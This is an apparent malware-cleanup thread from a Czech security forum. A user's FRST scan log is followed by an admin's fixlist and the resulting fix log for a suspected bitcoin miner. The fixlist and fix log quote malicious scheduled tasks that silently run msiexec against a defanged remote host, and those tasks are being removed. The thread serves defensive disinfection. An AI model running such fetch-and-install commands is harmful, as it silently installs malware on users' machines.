FirewallRules: [{F49A626E-6773-48DD-B529-1D2CABA6DB40}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BB23635-3555-4760-8329-9C3E6BEC50D9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5EF6B97B-6CC2-4D6D-A2FD-2170143E542C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CC44B33F-2809-487C-8B49-0064BD70855A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{73400E7A-F989-43CB-84D0-D1EA511B25F9}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{380E9148-9BA9-482E-A41C-82E22059545A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1A893123-B4BA-456F-A0C7-41F838DC949F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{8DB1E1F0-16A6-4606-9005-2050E5C78DE7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{94EB72EF-A6B6-40A4-B5C2-6012F19A2856}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C58183BB-F885-413A-8CCD-F9C3CCA34618}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{4D6DA014-7F0C-4B62-961A-70A13657F889}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{04F8F7EA-9E8D-4B8A-AA7C-E1546EBC72BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D2FA1B8F-C328-4C2E-AA5B-FB60C501ECC0}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{10D54F44-89D5-4BBE-9707-0159D50EF144}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8B080234-427A-4E7E-BDED-E4853E19C777}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{C6A43CF8-A945-4350-ADBF-68B3F3A1E9D5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{D96CE39B-1EC5-47C4-B76F-591963112C3F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2559EE57-6464-4F43-9CA4-3245EA7A496F}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1B2A11D6-89E4-4D54-8C29-31E8F4DA6D77}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{674586D3-506E-4FDD-A8AE-D3FAF3B0DA7A}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{CD11B4D0-772F-453F-A1F0-BC0E1CF510E6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{13D2236C-FE05-4D62-9CFA-6200735089C2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{FD2FA0E1-2074-415C-9F02-10C196F2C6A2}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{8847043E-064A-490F-804D-68759745A67C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8061FEA0-EF8E-4BF6-B1BB-808DED40D163}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{93678E0E-C66D-43DA-868A-F9E2058773BD}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe
FirewallRules: [{59C93D05-4690-44B4-9389-0F118AD02F38}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

07-01-2019 21:54:57 Naplánovaný kontrolní bod
11-01-2019 13:06:14 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Intel(R) Display Audio
Description: Intel(R) Display Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel(R) Corporation
Service: IntcDAud
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver


==================== Event log errors: =========================

Application errors:
==================
Error: (01/11/2019 08:07:55 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:03 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:02 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:01 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:09:00 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:59 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:58 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.

Error: (01/11/2019 08:08:57 PM) (Source: SecurityCenter) (EventID: 16) (User: )
Description: Při aktualizaci stavu na SECURITY_PRODUCT_STATE_OFF došlo k chybě.


System errors:
=============
Error: (01/12/2019 12:05:07 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby EventSystem s argumenty Není k dispozici za účelem spuštění serveru:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (01/12/2019 12:04:21 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:24 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:03:09 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B68-F52A-11D8-B9A5-505054503030}

Error: (01/12/2019 12:02:11 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:01:05 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby TokenBroker s argumenty Není k dispozici za účelem spuštění serveru:
Windows.Internal.Security.Authentication.Web.TokenBrokerInternal

Error: (01/12/2019 12:00:59 AM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-VBSMI5O)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby netprofm s argumenty Není k dispozici za účelem spuštění serveru:
{A47979D2-C419-11D9-A5B4-001185AD2B89}


Windows Defender:
===================================
Date: 2019-01-11 13:05:02.337
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {C7624ED8-55B8-4C11-A697-F488F786E077}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Úplné prohledávání
Uživatel: DESKTOP-VBSMI5O\Martin

Date: 2019-01-10 19:36:54.115
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {3AEA90E1-AC2C-415F-92A2-FF1B00481283}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:23:18.123
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B5282268-AE53-47D3-948C-ECE9541D4170}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 19:01:02.490
Description:
Prohledávání Antivirová ochrana v programu Windows Defender bylo zastaveno před dokončením.
ID prohledávání: {B8CB204C-EF17-40F0-8A73-72ED9379FE3F}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2019-01-10 17:30:21.507
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:JS/Redirector!rfn
ID: 2147692383
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\ulol\AppData\Roaming\product.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: DESKTOP-VBSMI5O\Martin
Název procesu: C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp
Verze podpisu: AV: 1.283.2606.0, AS: 1.283.2606.0, NIS: 1.283.2606.0
Verze modulu: AM: 1.1.15500.2, NIS: 1.1.15500.2

Date: 2019-01-11 23:59:21.017
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 20:05:50.438
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2019-01-11 13:46:01.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2019-01-11 19:33:13.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:23:44.957
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 19:02:52.546
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:50:49.237
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:35:34.802
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 18:28:40.259
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 17:56:09.418
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-01-11 15:33:10.017
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\atc.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 16%
Total physical RAM: 6035.48 MB
Available physical RAM: 5059.46 MB
Total Virtual: 6995.48 MB
Available Virtual: 6223.95 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:902.98 GB) (Free:593.08 GB) NTFS

\\?\Volume{7531e688-2fc9-4f9c-adf4-293c168a2c7e}\ (Windows RE tools) (Fixed) (Total:0.49 GB) (Free:0.17 GB) NTFS
\\?\Volume{ab46e8c9-01c0-4456-83ee-e16ccf8e90a8}\ () (Fixed) (Total:0.84 GB) (Free:0.33 GB) NTFS
\\?\Volume{d5549186-e4a3-4c4f-91cf-dc8b1b6f6540}\ () (Fixed) (Total:0.44 GB) (Free:0.42 GB) NTFS
\\?\Volume{2b981f92-3351-4f9f-b83d-9d44c784b14a}\ () (Fixed) (Total:0.34 GB) (Free:0.31 GB) NTFS
\\?\Volume{44e90043-829f-4bc5-b6bf-38a1d1519b56}\ (SAMSUNG_REC2) (Fixed) (Total:25 GB) (Free:0.91 GB) NTFS
\\?\Volume{318b7a2b-74b1-41bd-4173-636c65706975}\ (SAMSUNG_REC) (Fixed) (Total:1 GB) (Free:0.28 GB) FAT32
\\?\Volume{fe517963-fc07-4878-9792-efa4b3e98e24}\ (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 4EC8E0BC)

Partition: GPT.

==================== End of Addition.txt ============================


Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 11:26
Site Admin

Joined: 30 Oct 2003 13:42
Posts: 107885
Location: Plzeň
Open Notepad and copy the following into it:

Quote:
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End


Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When the run finishes, a log will appear; copy it here.

_________________
Post questions and logs only in your own threads. Private messages, ICQ and e-mail are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Apart from its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.


Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 11:43
Visitor

Joined: 10 Feb 2012 14:30
Posts: 8
Fix result of Farbar Recovery Scan Tool (x64) Version: 28.09.2018
Ran by Martin (12-01-2019 11:27:39) Run:1
Running from C:\Users\ulol\Desktop
Loaded Profiles: Martin (Available Profiles: defaultuser0 & Martin)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {4fc3e674-a3f9-11e8-b924-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec38e4-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {84ec39f6-b5a9-11e8-b92a-20898411baf6} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {df1b3e25-3b2c-11e8-b912-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f6086f2d-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-195099987-321758953-278711717-1001\...\MountPoints2: {f608762c-f889-11e8-b934-50b7c3b63006} - "E:\HiSuiteDownLoader.exe"
SearchScopes: HKU\S-1-5-21-195099987-321758953-278711717-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
U2 bddci; no ImagePath
C:\WINDOWS\System32\Tasks\kuaejfar
C:\WINDOWS\System32\Tasks\gcknyzn
C:\Users\ulol\rstr2.ini
C:\ProgramData\ts.dat
C:\ProgramData\lock.dat
C:\ProgramData\irw.atsd
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}
C:\ProgramData\ext.dat
C:\ProgramData\ext.dat
C:\ProgramData\lock.dat
C:\ProgramData\ts.dat
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe
C:\Users\ulol\AppData\Local\Temp
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {B0400B46-4EE3-44BE-9C04-F436BEF5665F} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {31EC4593-383C-4B64-9941-178C628FAEAF} - System32\Tasks\kuaejfar => "msiexec" /q -package hxxps://superdomain1709.info/qjilljpzujimar.eau
Task: {7D591FD9-73EA-4790-8E68-404BAF098DDE} - System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => C:\Users\ulol\AppData\Roaming\MezyMLATmn.exe [1601-01-03] (Microsoft Corporation) <==== ATTENTION
Task: {0273991C-90F1-49BB-A997-73BF1C769F3D} - System32\Tasks\gcknyzn => "msiexec" -package hxxps://superdomain1709.info/ipuaop.nqm /q
C:\Users\ulol\AppData\Roaming\product.dll
C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4fc3e674-a3f9-11e8-b924-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{4fc3e674-a3f9-11e8-b924-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec38e4-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec38e4-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{84ec39f6-b5a9-11e8-b92a-20898411baf6}" => removed successfully
HKLM\Software\Classes\CLSID\{84ec39f6-b5a9-11e8-b92a-20898411baf6} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{df1b3e25-3b2c-11e8-b912-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{df1b3e25-3b2c-11e8-b912-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f6086f2d-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f6086f2d-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f608762c-f889-11e8-b934-50b7c3b63006}" => removed successfully
HKLM\Software\Classes\CLSID\{f608762c-f889-11e8-b934-50b7c3b63006} => not found
"HKU\S-1-5-21-195099987-321758953-278711717-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
"HKLM\System\CurrentControlSet\Services\bddci" => removed successfully
bddci => service removed successfully
C:\WINDOWS\System32\Tasks\kuaejfar => moved successfully
C:\WINDOWS\System32\Tasks\gcknyzn => moved successfully
C:\Users\ulol\rstr2.ini => moved successfully
C:\ProgramData\ts.dat => moved successfully
C:\ProgramData\lock.dat => moved successfully
C:\ProgramData\irw.atsd => moved successfully
C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => moved successfully
C:\ProgramData\ext.dat => moved successfully
"C:\ProgramData\ext.dat" => not found
"C:\ProgramData\lock.dat" => not found
"C:\ProgramData\ts.dat" => not found
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe => moved successfully
C:\Users\ulol\AppData\Local\Temp => moved successfully
"HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui" => removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"C:\WINDOWS\System32\Tasks\kuaejfar" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kuaejfar" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"C:\WINDOWS\System32\Tasks\gcknyzn" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gcknyzn" => removed successfully
"C:\Users\ulol\AppData\Roaming\product.dll" => not found
"C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp" => not found
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 67849688 B
Java, Flash, Steam htmlcache => 1243 B
Windows/system/drivers => 426182573 B
Edge => 1858418 B
Chrome => 813142935 B
Firefox => 264735320 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 19070 B
LocalService => 0 B
NetworkService => 410114 B
NetworkService => 0 B
defaultuser0 => 7168 B
ulol => 4353724 B

RecycleBin => 49348547671 B
EmptyTemp: => 47.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 11:30:15 ====


Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 11:53
Visitor

Joined: 10 Feb 2012 14:30
Posts: 8
The antimalware can now be launched. It looks like we succeeded!


Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 12:49
Site Admin

Joined: 30 Oct 2003 13:42
Posts: 107885
Location: Plzeň
There were remnants of the junk left behind. I'm glad! :)

Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 12:50
Visitor

Joined: 10 Feb 2012 14:30
Posts: 8
If that is everything, then thank you very much :)


Post subject: Re: bitcoin miner
Posted: 12 Jan 2019 16:54
Site Admin

Joined: 30 Oct 2003 13:42
Posts: 107885
Location: Plzeň
That is all from my side, and you're welcome! :)
